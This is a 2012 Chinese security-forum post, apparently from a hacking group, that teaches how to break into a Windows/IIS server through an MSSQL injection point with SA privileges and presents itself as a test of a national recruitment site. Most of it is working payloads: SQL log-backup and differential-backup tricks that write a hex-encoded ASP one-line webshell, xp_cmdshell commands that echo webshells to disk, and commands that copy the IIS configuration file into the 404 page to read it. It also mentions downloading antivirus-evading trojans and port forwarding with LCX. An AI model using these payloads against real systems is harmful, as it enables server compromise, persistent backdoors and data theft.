找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————9 U* Y/ `( u' F, R( j( j
. E; `- K8 |7 R5 Z* v
# S( H: M! H" a( Y
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
4 ^% F3 u3 u/ l% |# _; V( y5 D  R+ ]* `' I4 `
                                                                 - M! G: {2 y3 P6 x
                                                                 9 r# v0 h) j9 Z8 x
                                                                  论坛: http://www.90team.net/. q+ J# v. N; O5 y

1 e" t2 [, _5 i
: o# k& Z4 s* h6 F
$ }- t. g+ |2 h- j- y5 H友情检测国家人才网# D6 Q+ M% r4 {# j
. ~1 w0 B* E1 O1 W! x: i6 I: Z* U
1 q& O+ Y9 }* C; S3 P
内容:MSSQL注入SA权限不显错模式下的入侵
7 F+ l- B: q' Y4 S5 E0 Y: K, c; r/ L$ [) e
  h7 C% s( G& E: x- P% `9 y) Q5 z
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
7 {$ G* j! J2 V9 R; I4 W* ?
$ p; K5 B% l9 w: B我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。1 J% {9 _6 C' |
- ?; a: n" @9 y
. Y; ?/ }* H+ r2 C
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ V8 b1 Y; [0 \
8 e" s4 h- n) U: Y; g; Z思路:
' y5 M* s7 a" u3 U$ u* e) t' P8 y
) S3 o. p7 {; m2 o  M; L首先:
0 f9 V* p# f; Q9 i& E% A
3 H7 m3 q0 S+ @4 y" I3 I3 ^通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。$ u7 ^$ [$ K9 g
7 s" F2 V% U; D( p  ^# F1 D
1.日志备份获得Webshell6 z+ ~7 @; J# {* o/ L' M

: m4 L$ @# y( E9 L7 {$ K2.数据库差异备份获得Webshell
9 ?0 N$ _' n6 s2 a" Y) H, y- s' ^
2 g4 ~' G/ w+ }; w/ J- [4.直接下载免杀远控木马。
1 U) u. L6 w! Q
4 `9 W: U2 {; v. j9 J. @! ^) e! P5.直接下载LCX将服务器端口转发出来
% N$ c$ C5 o3 N: c# F
7 j+ B# j, m3 X6 X6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。, p6 H/ o* K$ D" r- O, N7 w2 r. `
4 Q+ f  x0 S4 o4 I3 Y

4 j4 [: q( n+ O2 @- I
, H5 R) [& J: D! B3 U) H2 a% x在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
$ ~! [1 c$ E% _* |5 J; O3 O: H9 [. }# ~- l6 g) ^! j
我直接演示后面一个方法
7 G5 w5 ~( v7 c$ u' G6 y" a. V; Q6 C& |- S4 p
) h; t8 D' ~& o+ O. B
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
3 I' R4 g6 B% h% U7 R. s
/ H, j! h& e) s+ ~% Z) F1 ]  l
: N, C* I; Q! `% ~! }2 B5 o! d; y, @& n, \9 n& p4 h$ G: H% d& ^

  X/ s9 u# P6 q/ m" R0 d3 P+ v◆日志备份:- _/ B* r+ Y/ g7 |0 d- `

3 u' n' R& ?9 Q2 @* ?+ C  t; Z1 g: k$ E. C. `
1. 进行初始备份
1 ^6 ~. o& I- n# ~; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
7 e+ r3 m  D+ P. ?& g# c( X- T! H( D" h! L' V; A
2. 插入数据4 T( E1 A* Y1 p. y* Z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
/ w+ s* O4 b! U3 J; v% f
/ a1 U) w* J/ j, O6 N; R/ C% b0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ |  q+ F3 c4 z3 s4 f. Q) H  8 b- B( T3 b) s, Q6 y$ P3 r2 f
3. 备份并获得文件,删除临时表
* R9 _+ E, J* J; w5 w6 b/ ?+ D;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--/ }2 f: m! a/ S/ B$ W

" ?2 l3 j) L  e: H/ }. L  m, w9 l( f  K$ [" J( A0 \! A: h! b8 \
$ U( y: w) m$ S8 ?: V1 d, ?
◆数据库差异备份# l; b* c# x& |, ^1 w6 G

, o7 B- m* s- o$ Z8 z* h2 S( a) \. @(1. 进行差异备份准备工作: @: ?* }% f( R2 T

1 q! Z! `! W: r* {6 U/ E;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--( ]0 |& X& G# M' G; y; e

# \0 ]8 e7 ]# L0 y) z6 t上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
' k0 j, J# y9 ~! I
! f# n* @6 p5 G& [- r# }! \2 W, ^  {( D7 }% y0 i( `
(2. 将数据写入到数据库
$ c4 p* s% V, x# S* a. v1 S# A* x6 s;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- . F6 ~/ C9 G$ O5 F# x% Z/ d
7 R3 h% O: j# D9 q  i3 ~3 C
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>: H7 q& ]: h+ I+ f0 I; o4 W' P
5 Q0 }" {, R7 S" T; U
3. 备份数据库并清理临时文件2 f: [0 r5 ?% C" T. B' V4 w

6 [2 s$ K- ~* W( ^;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--0 i  v7 Z6 L3 }& [+ l0 L

* C: b) v8 R4 g* ?/ _0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 $ Z3 r9 G& L+ I# P
5 Y# J& {7 D, H$ D5 [) `! n

0 x- X: D/ z; P! S2 N& E7 f; S( F: E
, O7 ]" `: F' e, M用^转义字符来写ASP(一句话木马)文件的方法:   
$ P8 Y5 c5 |; T( ~
& u6 b7 z4 F# _5 ?  l1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--& R- y; {( R- e5 p8 y

! Z6 R* s, u( w3 _2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
5 {3 J5 u# O$ Z$ C/ V3 w, N. ]! i; K) q  V% ^3 u# t- p* v
读取IIS配置信息获取web路径
5 l0 B" t/ B4 [5 J$ T; }$ B3 Y6 H0 _' {% |' q. q
     
# t. r5 Z% I! y1 u5 g2 ]3 m     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--9 x* W! R! a+ t
5 Y) P( e- f5 I. o& z6 P3 q  @
执行命令
9 t; X) ?9 g) Q2 b/ G# H8 z  R1 o     - `  D" _% o# Y0 R
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
3 J+ J- n4 b/ B2 M+ J
$ _& s" f/ U0 c; q: W; A3 g6 [* z( |2 I' O& }" X% x6 R

& T! T4 h5 A! k1 J0 \3 r) K/ w. N, Q  m9 e

* P6 S* x- F$ r5 Z0 w# w
: u7 m1 J6 q5 ?7 k6 w  Y
6 ~. v+ M6 K0 W
6 B; K( X6 W# C# W3 q0 w) D9 {6 R: v! H' E$ g

$ c9 J# @; f1 ^: P3 v
' J% e8 L$ \. P; w/ u; X
7 ]; v- R! f4 G9 m9 [- B7 B
( r2 \- R6 j. b3 m; _+ O( K
' n9 G, o" t. w
7 z; H/ T% a% r7 r+ B1 E
& C/ q8 i0 W8 i' O
0 T, @2 V" s5 Y4 |
# _6 G2 N7 F2 U) w4 G
7 N6 H* _1 U' ?2 I/ n' x; D% r  O0 x/ B# m  s  Z3 c, V

* {% E# d! I6 F" ~: F- N* w* R, B9 |- f) N& F. z+ W: q
1 b1 h' {, N$ s2 C. w, M: i

  q8 N' g" C9 m( t! f0 \* t7 X: H. L- d& X

/ ~) z; L+ H. @& Z0 U) i7 [% J7 @% d$ p. q2 f) S
2 H3 @0 u9 p( n7 }: j7 I

4 \% s8 c6 O! t4 I( u1 @% ~  t' _1 E4 k! L* @
2 o8 y, q5 n7 S

. H) z4 O7 M3 r9 @. Z+ Z0 E
1 ]1 b1 U3 \$ c/ {+ C, F& q3 o* q! q8 o7 _! @. i

5 c( `, ^/ ?& Z" |  S% d! x+ F, y$ O6 V" x* Y  X  P! F* {# q" |6 B9 s
# ^" `, m4 v  G
8 \2 m" N: O+ ]+ ^8 J4 r
! z  j1 I: e1 F0 `

' c6 e- q& y6 j) q+ Z+ f( `; E9 y/ U6 j" C1 I7 h$ o5 I
3 E1 M- L( @3 w: J  U# i. e' Y
* J4 L6 s* K  {, w) t6 R
" r0 \4 v- G4 V/ O& l
& `7 D* ^2 m, n. @) c/ |' J' ?' I

: w. f3 i: L- D9 j' n7 }5 i9 K5 a3 U* j# _. g

' s. }9 T1 ^& _/ o' K; H0 f% H+ {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表